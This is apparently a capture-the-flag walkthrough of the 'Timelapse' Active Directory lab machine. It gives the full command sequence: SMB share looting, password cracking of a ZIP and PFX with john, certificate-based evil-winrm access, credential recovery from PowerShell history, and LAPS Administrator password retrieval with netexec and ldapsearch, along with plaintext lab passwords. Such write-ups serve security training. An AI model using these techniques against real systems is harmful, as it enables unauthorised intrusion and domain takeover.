Overview

Timelapse is an Active Directory machine that demonstrates how exposed SMB backups can lead to certificate-based WinRM access, followed by credential discovery in PowerShell history and full compromise through LAPS password retrieval.

Attack Chain

  • Enumerate exposed Active Directory services
  • Discover anonymous SMB access to the Shares share
  • Download a password-protected WinRM backup archive
  • Crack the ZIP password with zip2john and john
  • Extract a password-protected PFX certificate file
  • Crack the PFX password and extract the certificate and private key
  • Authenticate over WinRM with certificate-based authentication as legacyy
  • Recover svc_deploy credentials from PowerShell history
  • Identify svc_deploy as a member of LAPS_Readers
  • Read the local Administrator password from LAPS
  • Authenticate as Administrator over WinRM

Enumeration

Port Scanning

We start by defining the target and running a full TCP port scan to identify the exposed services.

export IP=10.129.66.33; export NAME=TIMELAPSE; echo $IP; echo $NAME; ping $IP -c 1

nmap --min-rate 4500 --max-rtt-timeout 1500ms $IP -Pn -n -p- -v -oA scans/nmap_allports_$NAME

ports=$(cat scans/nmap_allports_$NAME.nmap | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//); echo $ports

nmap $IP -p$ports -Pn --disable-arp-ping -sC -sV -oA scans/nmap_initial_$NAME -v

The open TCP ports are:

53,88,135,139,389,445,464,593,636,3268,3269,5986,9389,49667,49673,49674,59260

nmap results

Findings

The scan results show a typical Active Directory attack surface. DNS (53), Kerberos (88), RPC (135), SMB (139, 445), LDAP (389, 636), and the Global Catalog ports 3268 and 3269 are exposed. WinRM over HTTPS is also available on port 5986, which becomes important later because the initial access path uses certificate-based authentication.

SMB Enumeration

With SMB exposed, we check whether anonymous share enumeration is allowed.

smbclient -N -L //$IP/

A non-default share named Shares is available.

smb shares

We connect to the share to inspect its contents.

smbclient //$IP/Shares

Inside the share, there are two folders: Dev and HelpDesk.

shares folders

To make local analysis easier, the accessible content is downloaded recursively with smbget.

smbget --recursive smb://Shares/

smbget download

The Dev directory contains winrm_backup.zip, but the archive is password protected.

password protected zip

Foothold

Cracking the WinRM Backup Archive

To crack the ZIP file, we first convert it into a John-readable hash using zip2john.

zip2john Dev/winrm_backup.zip > winrm_backup.hash

zip2john

The hash is then cracked with john using rockyou.txt.

john --wordlist=/usr/share/wordlists/rockyou.txt winrm_backup.hash

The password is recovered successfully.

john zip password

supremelegacy

Using the recovered password, the archive is extracted and reveals legacyy_dev_auth.pfx.

extract pfx

A PFX file stores a certificate together with its corresponding private key. In this case, it is also password protected, so we need to crack it before it can be used.

Cracking the PFX Password

The PFX file is converted into a John-readable hash with pfx2john.

pfx2john legacyy_dev_auth.pfx > pfx.hash

Then the hash is cracked with john.

john --wordlist=/usr/share/wordlists/rockyou.txt pfx.hash

The password is recovered successfully.

john pfx password

thuglegacy

Extracting the Certificate and Private Key

With the PFX password known, openssl is used to extract the private key and certificate.

openssl pkcs12 -in loot/legacyy_dev_auth.pfx -nocerts -out private_key.key -nodes

openssl pkcs12 -in loot/legacyy_dev_auth.pfx -clcerts -nokeys -out certificate.crt

The result is a usable private key and certificate pair.

extract certificate and key

WinRM Certificate Authentication

Because WinRM over HTTPS is open on port 5986, we can authenticate with evil-winrm using the extracted certificate and private key. The -S flag enables SSL, while -c and -k provide the certificate and key.

evil-winrm -i $IP -S -c certificate.crt -k private_key.key

This gives us a shell as legacyy.

legacyy winrm shell

The user flag can now be read.

type C:\Users\legacy\Desktop\user.txt

user flag

Lateral Movement

PowerShell History Enumeration

After gaining access as legacyy, we search user directories for PowerShell history files.

Get-ChildItem -Path "C:\Users" -Filter "ConsoleHost_history.txt" -Recurse -ErrorAction SilentlyContinue -Force

powershell history search

The history file is located at:

C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Reviewing the file reveals credentials for the svc_deploy service account.

svc deploy credentials

svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV

Shell as svc_deploy

The credentials are used with evil-winrm. Since WinRM is exposed over HTTPS on this machine, the -S flag is used again.

evil-winrm -i $IP -u 'svc_deploy' -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S

This gives us a shell as svc_deploy.

svc deploy winrm shell

Privilege Escalation

Group Enumeration

With access as svc_deploy, we check the account’s domain group membership.

net user svc_deploy /domain

The LAPS_Readers group immediately stands out. LAPS is the Local Administrator Password Solution, which is used to manage local administrator passwords on domain-joined machines.

laps readers group

Membership in LAPS_Readers suggests that the account may be able to read the local Administrator password stored in Active Directory.

Reading the LAPS Password with NetExec

There are multiple ways to retrieve LAPS passwords from Active Directory. Here, netexec is used first with the laps module.

nxc ldap $IP -d timelapse.htb -u 'svc_deploy' -p 'E3R$Q62^12p7PLlC%KWaxuaV' --module laps

The command successfully retrieves the local Administrator password.

nxc laps password

Reading the LAPS Password with LDAPSearch

The same password can also be read directly with ldapsearch by querying for the ms-MCS-AdmPwd attribute.

When passing the password on the command line, the $ character needs to be escaped.

ldapsearch -H ldap://$IP -x -b "DC=timelapse,DC=htb" -D "svc_deploy@timelapse.htb" -w "E3R\$Q62^12p7PLlC%KWaxuaV" '(ms-MCS-AdmPwd=*)' ms-Mcs-AdmPwd

This also returns the Administrator password.

ldapsearch laps password

The recovered local Administrator credentials are:

Administrator:84Za(;o0!4L00a2T[UNwE{4[

Administrator Access

Before opening a shell, the credentials are tested with netexec.

administrator credentials verify

With the credentials confirmed, an Administrator shell is opened with evil-winrm over SSL.

evil-winrm -i $IP -u 'Administrator' -p '84Za(;o0!4L00a2T[UNwE{4[' -S

This gives us an interactive shell as Administrator.

administrator shell

The root flag can now be read.

type C:\Users\Administrator\Desktop\root.txt

root flag

Key Takeaways

Timelapse shows how exposed backup material can become a complete compromise path in Active Directory. A readable SMB share exposed a password-protected ZIP archive containing a certificate file, which enabled certificate-based WinRM access once cracked. From there, PowerShell history revealed reusable service account credentials, and LAPS_Readers membership allowed the local Administrator password to be retrieved directly from Active Directory.